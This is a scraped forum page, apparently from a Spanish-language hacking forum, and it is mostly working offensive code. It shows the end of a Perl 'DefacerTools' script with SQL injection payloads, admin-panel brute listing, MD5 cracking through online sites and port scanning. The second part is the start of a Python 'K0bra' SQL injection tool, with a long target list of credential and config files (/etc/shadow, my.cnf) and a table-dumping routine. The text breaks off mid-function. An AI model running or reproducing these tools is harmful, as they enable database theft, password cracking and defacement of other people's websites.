'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/', 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/' ); my @dns = ('www'); #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); my %rta; my $que = new CGI; my @ques = $que->param; for (@ques) { $rta{$_} = $que->param($_); } print "Content-type:text/html\n\n"; print " <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>"; if ( $rta{'hex'} ) { logouno(); print qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>); copyright(); } elsif ( $rta{'textocode'} ) { logouno(); print "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>"; print "</center>"; copyright(); } elsif ( $rta{'panelfinder'} ) { logodos(); print qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>); copyright(); } elsif ( $rta{'buscarpanel'} ) { my $page = $rta{'buscarpanel'}; logodos(); print "<br>[+] Scanning $page<br><br>"; for $path (@panels) { $code = tomax( $page . "/" . $path ); if ( $code->is_success ) { print "[Link] : " . $page . "/" . $path . "<br>"; } } print "<br><br>[+] Finish<br>"; copyright(); } elsif ( $rta{'pathsfinder'} ) { logotres(); print qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>); copyright(); } elsif ( $rta{'buscarpaths'} ) { logotres(); my $page = $rta{'buscarpaths'}; my $code = toma($page); my @links = get_links($code); print "<br><br>[+] Finding paths<br><br>"; for my $com (@links) { my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); if ( $path =~ /\/(.*)$/ ) { my $path1 = $1; $page =~ s/$path1//ig; my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); if ( $path =~ /(.*)\// ) { my $parche = $1; unless ( $repetidos =~ /$parche/ ) { $repetidos .= " " . $parche; my $code = toma( "http://" . $auth . $parche ); if ( $code =~ /Index of (.*)</ig ) { my $dir_found = $1; chomp $dir_found; print "[+] Directory Found : $page/$dir_found<br>"; } } } } } print "<br><br>[+]Finished<br>"; copyright(); } elsif ( $rta{'sqliscanner'} ) { logocuatro(); print qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarsql'} ) { logocuatro(); print "<br><br>[+] Scanning page<br><br>"; &length( $rta{'buscarsql'} ); print "<br><br>[+] Finished"; copyright(); } elsif ( $rta{'fuzzdns'} ) { logocinco(); print qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscardns'} ) { logocinco(); my $page = $rta{'buscardns'}; print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>"; for my $path (@dns) { $code = tomax( "http://" . $path . "." . $page ); if ( $code->is_success ) { print "[+] Found : http://" . $path . "." . $page . "<br>"; } } print "<br><br>[+] Finished<br><br>"; copyright(); } elsif ( $rta{'finderpass'} ) { logoseis(); print qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarhash'} ) { logoseis(); &crackit( $rta{'buscarhash'} ); copyright(); } elsif ( $rta{'portscanner'} ) { logosiete(); print qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarpuertos'} ) { logosiete(); scanuno( $rta{'buscarpuertos'} ); copyright(); } elsif ( $rta{'home'} ) { sintax(); } else { sintax(); } sub sintax { print qq( <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title> <br><br> <h1><center>DefacerTools</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr> <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr> <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr> <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr> <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr> <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td> </table> </center> ); } sub logouno { print qq( <center> <pre> @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@ @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @ </pre> ); } sub logodos { print qq( <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logotres { print qq( <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logocuatro { print qq( <center> <pre> @@@ @@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ @ </pre> ); } sub logocinco { print qq( <center> <pre> @@@@@ @@@@ @ @ @@@ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @ @@@@ @@@@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ @ @ @@ @ @ @ @@ @ @@@@ @@@@ @@@@ @ @ @@@ </pre> ); } sub logoseis { print qq( <center> <pre> @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@ @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@ </pre> ); } sub logosiete { print qq( <center> <pre> @@@@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ </pre> ); } sub copyright { print qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>); } sub length { print "<br>[+] Looking for the number of columns<br><br>"; my $rows = "0"; my $asc; my $page = $_[0]; ( $pass1, $pass2 ) = &bypass( $_[1] ); $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; $total = "1"; for my $rows ( 2 .. 200 ) { $asc .= "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; $total .= "," . $rows; $injection = $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc; $test = toma($injection); if ( $test =~ /RATSXPDOWN/ ) { @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g; $control = 1; my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); my $save = $auth; $total =~ s/$number[0]/hackman/; print "[SQLI] : " . $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "<br>"; details( $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, "--", "" ); } } } sub details { my ( $page, $bypass, $save ) = @_; ( $pass1, $pass2 ) = &bypass($bypass); if ( $page =~ /(.*)hackman(.*)/ig ) { print "<br>[+] Searching information..<br><br>"; my ( $start, $end ) = ( $1, $2 ); $inforschema = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2; $mysqluser = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2; $test3 = toma( $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2 ); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ( $test2 =~ /ERTOR854/ig ) { print "[mysql.user] : ON<br>"; } else { print "[mysql.user] : OFF<br>"; } if ( $test1 =~ /ERTOR854/ig ) { print "[information_schema.tables] : ON<br>"; } else { print "[information_schema.tables] : OFF<br>"; } if ( $test3 =~ /ERTOR854/ig ) { print "[load_file] : ON<br>"; } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start . $concat . $end . $pass2; $code = toma($injection); if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { print "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>"; } else { print "<br>[-] Not found any data<br>"; } } } sub encode { my $string = $_[0]; $hex = '0x'; for ( split //, $string ) { $hex .= sprintf "%x", ord; } return $hex; } sub bypass { if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); } elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); } else { return ( "+", "--" ); } } sub ascii { return join ',', unpack "U*", $_[0]; } sub toma { return $nave->get( $_[0] )->content; } sub tomax { return $nave->get( $_[0] ); } sub get_links { $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] ); return @links; sub agarrar { my ( $a, %b ) = @_; push( @links, values %b ); } } sub crackit { my $secret = $_[0]; print "<br><br>[+] Cracking $_[0]<br><br>"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex' => '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables' => '{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables' => '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables' => '{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">), } ); for my $data ( keys %hash ) { if ( $hash{$data}{tipo} eq "get" ) { $code = toma( $data . $_[0] ); if ( $code =~ /$hash{$data}{regex}/ig ) { print "<br>[+] Decoded : " . $1 . "<br><br>"; print $secret. ":" . $1 . "<br>"; } } else { $code = tomar( $data, $hash{$data}{variables} ); if ( $code =~ /$hash{$data}{regex}/ig ) { print $secret. ":" . $1 . "<br>"; } } } print "<br>[+] Finish<br>"; } sub tomar { my ( $web, $var ) = @_; return $nave->post( $web, [ %{$var} ] )->content; } sub scanuno { my %ports = ( "21" => "ftp", "22" => "ssh", "25" => "smtp", "80" => "http", "110" => "pop3", "3306" => "mysql" ); print "<br>[+] Scanning $_[0]<br><br><br>"; for my $port ( keys %ports ) { if ( new IO::Socket::INET( PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5 ) ) { print "[Port] : " . $port . " [Service] : " . $ports{$port} . "<br>"; } } print "<br><br>[+] Scan Finish<br>"; } # The End ?

#329

Scripting / [Python] K0bra 0.3

3 Diciembre 2011, 16:35 PM

Un completo scanner SQLI hecho en python

Las funciones son las siguientes

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile
Todo se guarda en logs ordenados
Manejo de control+c

Código (python) [Seleccionar] Expandir
#!usr/bin/python #k0bra 0.3 (C) Doddy Hackman 2011 import os,sys,urllib2,re,binascii from urlparse import urlparse files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"] def installer(): try: os.mkdir("logs",0777) except: pass def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text) file.close() def gethost(test): return urlparse(test).netloc def header() : print "" print "" print " @ @@ @ " print "@@ @ @ @@ " print " @ @@ @ @ @ @ @ @ @@@ " print " @ @ @ @ @@ @ @@@ @ @ " print " @@ @ @ @ @ @ @@@ " print " @ @ @ @ @ @ @ @ @ " print "@@@ @ @@ @@@ @@@ @@@@@" print "" print "" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/**/") else: return("+","--") def reiniciar(): copyright() raw_input() sta() def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n") print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) 